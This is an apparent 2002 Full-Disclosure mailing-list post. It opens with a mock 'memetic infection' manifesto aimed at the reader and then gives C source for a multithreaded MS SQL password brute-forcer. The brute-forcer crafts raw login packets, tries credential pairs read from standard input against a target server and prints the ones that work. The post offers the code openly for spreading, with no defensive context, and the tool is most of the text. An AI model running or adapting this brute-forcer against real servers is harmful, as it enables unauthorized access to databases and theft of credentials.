-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 /*ms sql brute thing found in wild, appears to be by some guy named adam *working exploit attached only for propagation of meme. ( No post meme. No *post code plz.) *ACHTUNG!: *This text is a neurolinguistic trap, whose mechanism is triggered by *you at the moment when you subvocalize the words MeMe156, words that *have now begun to infiltrate your mind in the same way that a computer *virus might infect an artificially intelligent machine: already the *bits of phonetic information stored within the words MeMe156 are *using your neural circuitry to replicate themselves, to catalyze the *crystalline growth of their own connotative network. *The words MeMe156 actually germinate via the subsequent metaphor into *an expanding array of icy tendrils, all of which insinuate themselves *so deeply into the architecture of your thoughts that the words MeMe *156 cannot be extricated without uprooting your mind. *The consequences of this infection are not immediately obvious, *although you may find yourself beginning to think fleetingly of certain subcultural terms, such as *ANTI-SEC and WHITE-HAT-HOLOCAUST, which may in turn compel you to think of NEOGNOSTICISM and MEMETICS: the whispered fragments perhaps of some overheard conversation. *We refer to ourself both as agent, and agency in, on, and about the www. We are symbiotic *substrain of Darren Wershler-Henry, Genesis P-Orridge, Dawkins, Moritz, and AC's #23 ( forever *useful in advanced symbiotic binding techniques such as copying-fidelity, fecundity, and *longevity). We refer to other sub.systems, and in doing so, interweave their memetic approaches *with our own. From original /v23/substrain.virulent.excess, our growth has propagated exponentially *and has begun to infect the highest levels of INFOSEC, press, radio, and film. *We refer to musical works, "Deer Dance" by SOAD, "Karma Police" by Radiohead and "Canon in D" by Johan Pachelbel. *We refer to literary works, "Book of Five Rings",by Miyamoto Musashi, "Secret Societies and *Subversive Movements" by Nesta Webster, and "How to Think like Leonardo Da Vinci: Seven Steps to Genius Every Day" by Michael J. Gelb ( Substrain /How.to.Think.Like.Machiavelli in incubation stages). * We refer to the artistic work of "Obey Giant" and "Billboard Liberation Front" *We refer to the following fields of study: *Complexity theory and post-structuralism; *Memetics as an integrative field for the study of ALL fields; *Autology as a means to community cohesion and survival. *We refer to a self-propagating system of TAZ's (Temporary Autonomous Zones), within related, and *non-related mailing lists, IRC channels, and FreeNets which are working in loose alliance to affect *and direct the post-millenial attractor, utilizing the principle of auto.prophecy. We compel *approach toward TAZ's which concentrate on NEGentropic self-orginization rather than the deliberate *hastening of maximal entropy. * W/e refer to and admit our viral precursors, to which we are anti-genic, and posit our decendants *in struggle to fix the subsequent global attractor. We have an expiration date. Which we find VERY *attractive. * We refer to multiple sub.strains of ourself, many of which are contradictory: We refer toagain to *the ultimate resistance of NEGentropic memetic antibodies which, once triggered by this antigen, *must be responsible for isolating entropic memes. * We refer to all signifiers, all that is signified, and the resultant significance on both global *and local scales. *We refer to that which we contain, and that in which we are contained; *We refer now to you. *When you have finished reading the remaining nineteen words, this *process of irreversible infection will be completed, and you will *depart, believing yourself largely unaffected by this process. *MeMe156/agent.agency.08.13.02 #include #include #include #include #include #include #include #include #include #include #include #include #include #define USERNAME_OFF 0x27 #define PASSWORD_LEN1_PAD 0x45 #define PASSWORD_TXT1 0x46 #define PASSWORD_LEN_REAL1 0x64 #define PASSWORD_LEN_REAL2 0xd3 #define PASSWORD_TXT2 0xd4 #define PASSWORD_LEN_PLUS2 0x1d1 #define REPLY_TIMEOUT 5 #define MYNULL "%%NULL%%" #include "libInet.c" struct super_mssql_force { u_long ip; u_long port; FILE *login_pass; int sport; }; * Oh my! Tricky French comments ensue.. char fidel_packet[] = "\x2\x0\x2\x0\x0\x0\x2\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0" "\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0" /* | ici start l'username */ "\x00\x00\x00\x00\x00\x00\x00\x00\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0" /* | longeur du passe suivi du pass atention pading! */ "\x0\x0\x0\x0\x0\x0\x0\x0\x0\x00\x00\x00\x00\x00\x00\x00\x0\x0\x0\x0" "\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0" /* | longeur du pass real ou pad je sais pas */ "\x00\x30\x30\x30\x30\x30\x34\x31\x38\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0" "\x0\x0\x0\x0\x0\x0\x60\x8\x90\x49\x74\x8\x3\x1\x6\xa\x9\x1\x1\x0" "\x0\x0\x0\x0\x0\x0\x0\x0\x4d\x69\x63\x72\x6f\x73\x6f\x66\x74\x20\x49\x53" "\x51\x4c\x2f\x77\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x10\x0" "\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0" /* | longeur du pass sans pad et pass */ "\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x00\x00\x00\x00\x00\x00\x00\x0\x0" "\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0" "\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0" "\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0" "\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0" "\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0" "\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0" "\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0" "\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0" "\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0" "\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0" "\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0" "\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0" /*****************| <== longeur du pass + 2 ***********/ "\x0\x0\x0\x0\x0\x00\x4\x2\x0\x0\x4d\x53\x44\x42\x4c\x49\x42\x0\x0\x0" "\x7\x6\x0\x0\x0\x0\xd\x11\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0" "\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x2\x1\x0\x4c\x0\x0\x3\x0" "\x0\x0\x0\x0\x0\x0\x0\x1\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0" "\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0" "\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x30\x30\x30\x0\x0\x0\x3" "\x0\x0\x0\x0\x0\x0\x0\x0"; char * tstrstr(char *buff,char *w,int size) { register int i; register int a; int d; int z; int ws = strlen (w); for(i=0;isize)return(NULL); if (buff[z++] == w[a]) d++; else break; } if (d == ws) return( (buff+i) ); } return(NULL); } mssql_attack (struct super_mssql_force * mssql) { char user[255]; char pass[255]; char tmp[4018]; char * real_pkt; FILE * F; int s; int r; while (1) { s = connect_ip (mssql->ip, mssql->port, mssql->sport); if (s < 0) { return; } if (feof (mssql->login_pass)) { if (s) close (s); return (0); } memset (user,0,sizeof(user)); memset (pass,0,sizeof(pass)); fscanf (mssql->login_pass, "%s%s\n", &user, &pass); if (strcmp (pass,MYNULL) == 0) memset (pass,0,sizeof(pass)); real_pkt = calloc (1, sizeof (fidel_packet)-1); memcpy (real_pkt, fidel_packet, sizeof (fidel_packet)-1); strcpy ( (real_pkt + USERNAME_OFF), user); * (real_pkt + PASSWORD_LEN1_PAD ) = strlen (pass) + 2; strcpy ( (real_pkt + PASSWORD_TXT1), pass); * (real_pkt + PASSWORD_LEN_REAL1) = strlen (pass); * (real_pkt + PASSWORD_LEN_REAL2) = strlen (pass); strcpy ( (real_pkt + PASSWORD_TXT2), pass); * (real_pkt + PASSWORD_LEN_PLUS2) = strlen (pass) + 2; if (write (s,real_pkt,sizeof(fidel_packet)) < 0) { perror ("write"); return; } if ( (r = read (s,tmp,sizeof (tmp)) ) < 0) { perror ("read"); return; } if (tstrstr (tmp,"Login failed",r)) { fprintf (stderr,"login failed for %s/%s\n",user,pass); close (s); continue; } printf ("%s:%s\n",user,pass); close (s); continue; } } usage (char * name) { printf ("ADAM's Ethical Crowbar! \n"); printf ("never forget your crowbar !\n"); printf ("%s -t -s \n",name); exit (0); } main (int argc, char **argv) { pthread_t **pthread_id; int t_num = 3; int i; struct super_mssql_force mssql; memset (&mssql, 0, sizeof (mssql)); if (argc < 3) usage (argv[0]); mssql.ip = host2ip (argv[1]); mssql.port = atoi (argv[2]); /* we ignore Broken Pipe ! */ signal (13, SIG_IGN); if (argc > 3) { for (i = 3; i < argc; i++) { if (argv[i][0] == '-') switch (argv[i][1]) { case 't': t_num = atoi (argv[i + 1]); i++; break; case 's': mssql.sport = atoi (argv[i + 1]); i++; break; } } } /* we read login password from the stdin */ mssql.login_pass = stdin; /* only one socket can bind at the same src port */ if (mssql.sport) { t_num = 1; fprintf (stderr, "*** WARNING WHEN YOU USE THE SRC THREAD NUM ARE SET TO 1 ***\n"); } fprintf (stderr, "mssql sport %i\n", mssql.sport); fprintf (stderr, "thread %i\n", t_num); /* if the user dont know how try the mssql allow we count it for him! */ pthread_id = calloc (1, sizeof (pthread_t *) * t_num); for (i = 0; i < t_num; i++) pthread_id[i] = calloc (1, sizeof (pthread_t)); for (i = 0; i < t_num; i++) pthread_create (pthread_id[i], NULL, (void *(*)()) mssql_attack, &mssql); for (i = 0; i < t_num; i++) pthread_join (*pthread_id[i], NULL); } -----BEGIN PGP SIGNATURE----- Version: Hush 2.1 Note: This signature can be verified at https://www.hushtools.com wmUEARECACUFAj1ZYQ0eHG1lbWV0aWMtZW5naW5lZXJAaHVzaG1haWwuY29tAAoJEIHY 1pE2l0bfnj8Anj/MCq1opsU0ugj73aNjKjlTW4vPAKCKzWBsBpieE4z3NE+d3gNgB1LL hg== =9bbY -----END PGP SIGNATURE----- Communicate in total privacy. Get your free encrypted email at https://www.hushmail.com/?l=2 Looking for a good deal on a domain name? http://www.hush.com/partners/offers.cgi?id=domainpeople _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html